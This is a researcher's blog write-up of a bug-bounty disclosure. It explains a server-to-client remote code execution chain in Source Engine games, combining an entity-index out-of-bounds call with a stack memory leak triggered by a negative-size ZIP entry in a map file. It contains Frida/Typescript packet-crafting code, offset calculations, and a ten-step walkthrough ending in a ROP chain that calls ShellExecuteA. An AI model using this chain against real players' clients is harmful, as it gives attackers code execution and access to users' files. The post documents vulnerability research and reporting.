Normal view

There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
